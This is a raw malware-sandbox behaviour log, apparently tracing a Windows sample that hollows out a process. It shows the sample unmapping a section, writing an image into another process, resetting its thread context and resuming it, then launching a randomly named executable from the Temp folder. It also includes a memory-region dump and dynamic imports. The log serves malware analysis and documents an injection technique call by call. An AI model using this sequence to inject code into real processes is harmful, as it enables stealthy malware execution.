[199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, 
[217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, 
[398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0108.706] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0108.706] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0108.707] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0108.707] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x1d47e0*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1d47e0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.707] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x1d4be0, nSize=0x0, 
lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0108.707] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x1d4be0*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1d4be0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.714] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x2291e0*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2291e0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.714] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x1d4914*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1d4914*, lpNumberOfBytesWritten=0x0) returned 1 [0108.714] SetThreadContext (hThread=0x48, lpContext=0x390000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, 
EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, 
[186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, 
[367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0108.714] ResumeThread (hThread=0x48) returned 0x1 [0108.714] CloseHandle (hObject=0x48) returned 1 [0108.714] CloseHandle (hObject=0x4c) returned 1 [0108.715] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.715] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0108.715] ExitProcess (uExitCode=0x0) Process: id = "33" image_name = 
"wtsk8wxh.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe" page_root = "0x7ea168c0" os_pid = "0xcb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xca4" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5014 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5015 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5016 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 5017 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5018 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5019 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5020 start_va = 0x7ffb0000 
end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5021 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 5022 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5059 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5060 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5061 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 5062 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 5063 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 5064 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5065 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5066 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5067 start_va = 0x76480000 end_va = 0x76489fff 
entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5068 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5069 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5070 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5071 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5072 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5073 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5074 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5075 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5076 
start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5077 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5078 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5079 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5080 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5081 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5082 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 5083 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 5084 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 5085 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 5086 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: 
"c:\\windows\\system32\\ws2_32.dll") Region: id = 5087 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5088 start_va = 0x1440000 end_va = 0x14dffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 5133 start_va = 0x14e0000 end_va = 0x17aefff entry_point = 0x14e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5134 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 5135 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5240 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 5241 start_va = 0x17b0000 end_va = 0x18affff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 5242 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5243 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 5244 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: 
"c:\\windows\\system32\\dnsapi.dll") Region: id = 5245 start_va = 0x230000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 5246 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5247 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5291 start_va = 0x18b0000 end_va = 0x19affff entry_point = 0x0 region_type = private name = "private_0x00000000018b0000" filename = "" Region: id = 5292 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5293 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 51 os_tid = 0xcb8 [0108.372] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.373] GetProcAddress (hModule=0x76910000, 
